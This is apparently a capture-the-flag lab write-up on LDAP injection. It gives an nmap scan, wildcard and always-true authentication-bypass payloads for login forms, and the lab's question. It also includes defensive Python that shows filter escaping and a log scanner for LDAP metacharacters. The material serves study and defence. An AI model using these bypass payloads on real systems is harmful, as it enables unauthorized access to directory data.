LDAP Injection Attacks
Objective: Exploit LDAP injection vulnerabilities in web applications to bypass authentication and access sensitive directory information.
Overview
LDAP Injection attacks target web applications that use LDAP (Lightweight Directory Access Protocol) for authentication or user management. By injecting special characters into LDAP queries, attackers can bypass authentication and manipulate directory searches.
HTB Academy Lab Solution
Lab: Authentication Bypass
Question: "After bypassing the login, what is the website 'Powered by'?"
Step 1: Service Discovery
# Nmap scan to identify services
nmap -p- -sC -sV --open --min-rate=1000 TARGET
# Expected results:
# 80/tcp open http Apache httpd 2.4.41 (Ubuntu)
# 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
Step 2: LDAP Injection Attack
# Navigate to login page
# URL: http://TARGET/
# LDAP injection payloads for authentication bypass:
Username: *
Password: *
# Alternative payloads:
Username: admin
Password: *
Username: *
Password: password
Step 3: Post-Authentication Analysis
# After successful login bypass, examine the page source
# Look for "Powered by" information in:
# - Page footer
# - HTML comments
# - HTTP headers
# - About/version pages
Expected Answer: Framework/CMS name from "Powered by" text (extract from bypassed page)
LDAP Injection Techniques
Common Injection Characters
# Special LDAP characters for injection
* # Wildcard - matches any number of characters
( ) # Parentheses - group expressions
| # Logical OR operator
& # Logical AND operator
Authentication Bypass Payloads
# Wildcard injection
Username: *
Password: *
# Always-true conditions
Username: (cn=*)
Password: anything
Username: (objectClass=*)
Password: anything
Query Structure Manipulation
# Original LDAP query:
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))
# Injected query with *:
(&(objectClass=user)(sAMAccountName=*)(userPassword=*))
# Result: Matches any user with any password
Technical Details
LDAP Query Components
# Standard authentication query structure
(&(objectClass=user)(uid=$username)(userPassword=$password))
# Components:
# & = AND operator
# objectClass=user = filter for user objects
# uid=$username = username field
# userPassword=$password = password field
Injection Points
Username fields - Primary injection vector
Password fields - Secondary injection vector
Search filters - Advanced injection opportunities
DN parameters - Distinguished Name manipulation
Vulnerable Applications
Web portals using LDAP authentication
Enterprise applications with AD integration
Custom applications with poor input validation
Legacy systems without proper sanitization
Impact Assessment
Authentication Bypass:
Unauthorized access to protected resources
Administrative privilege escalation
User account enumeration
Directory information disclosure
Information Disclosure:
User credentials and attributes
Organizational structure data
Group memberships and permissions
System configuration details
Attack Escalation:
Lateral movement through directory services
Privilege escalation via group membership
Data exfiltration from LDAP directory
Further application compromise
Detection & Mitigation
Prevention:
Input validation - Sanitize all user inputs
Parameterized queries - Use prepared statements
Least privilege - Limit LDAP service account permissions
Escape special characters - Remove LDAP metacharacters
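The escaping recommended above, applied to the login filter shown under Query Structure Manipulation, as an added example that is not part of the original page: a small in-memory filter matcher (written here for the demo, not a real LDAP server) evaluates the concatenated filter against constructed directory entries, shows that the wildcard login matches every user object, and shows that RFC 4515 escaping of the submitted values (backslash, asterisk, parentheses and NUL replaced by \XX hex sequences) turns the same input into a literal value that matches nothing. The directory entries, account names and credentials are constructed sample data.

```python
import re

# Added example, not code from the original page: a minimal in-memory matcher
# for LDAP search filters, enough to show the effect of the wildcard payload
# and of RFC 4515 escaping. The directory entries below are constructed data.
DIRECTORY = [
    {"objectClass": "user", "sAMAccountName": "alice", "userPassword": "S3cret!"},
    {"objectClass": "user", "sAMAccountName": "bob", "userPassword": "hunter2"},
    {"objectClass": "group", "sAMAccountName": "admins"},
]

# RFC 4515 escapes for a value used inside a filter assertion. The backslash
# is handled first so the escapes added afterwards are not escaped again.
_ESCAPES = [("\\", "\\5c"), ("*", "\\2a"), ("(", "\\28"), (")", "\\29"), ("\x00", "\\00")]

def escape_filter_value(value: str) -> str:
    for raw, esc in _ESCAPES:
        value = value.replace(raw, esc)
    return value

def build_filter_vulnerable(username: str, password: str) -> str:
    # Plain string concatenation, as in the page's original query.
    return f"(&(objectClass=user)(sAMAccountName={username})(userPassword={password}))"

def build_filter_hardened(username: str, password: str) -> str:
    # Same filter, but every user-supplied value is escaped first.
    return "(&(objectClass=user)(sAMAccountName=%s)(userPassword=%s))" % (
        escape_filter_value(username), escape_filter_value(password))

def _parse(s: str, i: int):
    """Parse one parenthesised filter starting at s[i]; return (node, next index)."""
    if s[i] != "(":
        raise ValueError("expected '(' at offset %d" % i)
    i += 1
    if s[i] in "&|":                      # (&(f1)(f2)...) or (|(f1)(f2)...)
        op, i, children = s[i], i + 1, []
        while s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return (op, children), i + 1
    if s[i] == "!":                       # (!(f))
        child, i = _parse(s, i + 1)
        if s[i] != ")":
            raise ValueError("expected ')' at offset %d" % i)
        return ("!", [child]), i + 1
    end = s.index(")", i)                 # simple assertion: (attr=value)
    attr, _, value = s[i:end].partition("=")
    return ("=", attr, value), end + 1

def parse_filter(s: str):
    node, i = _parse(s, 0)
    if i != len(s):
        raise ValueError("trailing data after filter")
    return node

def _value_pattern(value: str) -> "re.Pattern":
    """Turn an assertion value into a regex: '*' is a wildcard, '\\XX' a literal byte."""
    parts, literal, i = [], "", 0
    while i < len(value):
        if value[i] == "\\":
            literal += chr(int(value[i + 1:i + 3], 16))
            i += 3
        elif value[i] == "*":
            parts.append(re.escape(literal))
            literal = ""
            i += 1
        else:
            literal += value[i]
            i += 1
    parts.append(re.escape(literal))
    return re.compile(".*".join(parts), re.IGNORECASE)

def matches(node, entry: dict) -> bool:
    kind = node[0]
    if kind == "&":
        return all(matches(c, entry) for c in node[1])
    if kind == "|":
        return any(matches(c, entry) for c in node[1])
    if kind == "!":
        return not matches(node[1][0], entry)
    _, attr, value = node
    return attr in entry and _value_pattern(value).fullmatch(entry[attr]) is not None

def authenticate(username: str, password: str, hardened: bool = False) -> list:
    """Return the account names the login filter matches against DIRECTORY."""
    build = build_filter_hardened if hardened else build_filter_vulnerable
    node = parse_filter(build(username, password))
    return [e["sAMAccountName"] for e in DIRECTORY if matches(node, e)]

if __name__ == "__main__":
    print(authenticate("alice", "S3cret!"))          # ['alice']
    print(authenticate("*", "*"))                    # ['alice', 'bob']: every user object
    print(build_filter_hardened("*", "*"))           # ...(sAMAccountName=\2a)(userPassword=\2a))
    print(authenticate("*", "*", hardened=True))     # []: the escaped value is a literal '*'
```

In a real application the escaping should come from the LDAP library (python-ldap's `ldap.filter.escape_filter_chars` and ldap3's `ldap3.utils.conv.escape_filter_chars` do the same substitutions), the login should only proceed when the search returns exactly one entry, and the password is best verified by binding as that entry rather than by placing it in a filter.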
Detection:
Log analysis - Monitor for LDAP query anomalies
Authentication monitoring - Track failed/successful logins
Input validation testing - Regular security assessments
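The log analysis item above, as an added example that is not part of the original page: a scanner over constructed application login log lines (the key=value layout is assumed for the demo, not any real product's format) that flags usernames containing LDAP filter metacharacters, URL-decodes the value first so an encoded wildcard such as %2a is not missed, and raises the severity when such a login was recorded as successful.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines from a hypothetical application login log; the
# key=value layout is an assumption for this example, not a real product's format.
SAMPLE_LOG = """\
2024-05-01T09:00:01Z login user="alice" result=success src=10.0.0.5
2024-05-01T09:00:07Z login user="bob" result=failure src=10.0.0.9
2024-05-01T09:01:12Z login user="*" result=success src=203.0.113.7
2024-05-01T09:01:40Z login user="admin" result=failure src=203.0.113.7
2024-05-01T09:02:03Z login user="%2a" result=success src=203.0.113.7
2024-05-01T09:02:30Z login user="(objectClass=*)" result=failure src=203.0.113.7
2024-05-01T09:03:00Z login user="carol" result=success src=10.0.0.12
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) login user="(?P<user>[^"]*)" result=(?P<result>\w+) src=(?P<src>\S+)$'
)
# Characters that have meaning inside an LDAP filter and never belong in a username.
LDAP_META = set("*()|&\\\x00")

def ldap_metachars(value: str) -> list:
    """Return the LDAP metacharacters present in value, sorted, after URL-decoding
    so that an encoded wildcard (%2a) is caught as well as a literal one."""
    decoded = unquote(value)
    return sorted(c for c in set(decoded) if c in LDAP_META)

def scan_auth_log(text: str) -> list:
    """Return one finding per log line whose username carries LDAP metacharacters.
    A successful login with such a username is rated high: a real account name
    would not contain them, so the filter was almost certainly manipulated."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # lines in another format are ignored here
        chars = ldap_metachars(m["user"])
        if not chars:
            continue
        findings.append({
            "line": lineno,
            "src": m["src"],
            "user": m["user"],
            "chars": chars,
            "severity": "high" if m["result"] == "success" else "medium",
        })
    return findings

def sources_by_finding_count(findings: list) -> Counter:
    """Count flagged attempts per source address to spot one origin probing the form."""
    return Counter(f["src"] for f in findings)

if __name__ == "__main__":
    found = scan_auth_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print(sources_by_finding_count(found))
```

Against the sample lines this reports the literal `*`, the encoded `%2a` and the `(objectClass=*)` attempts, all from the same source, with the two successful ones rated high; the regex and field names need adapting to the real log format, and a success with metacharacters in the username is worth an alert on its own.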
Pro Tip: LDAP injection is often overlooked compared to SQL injection, but it's equally dangerous in enterprise environments with Active Directory integration - always test authentication forms with wildcard characters.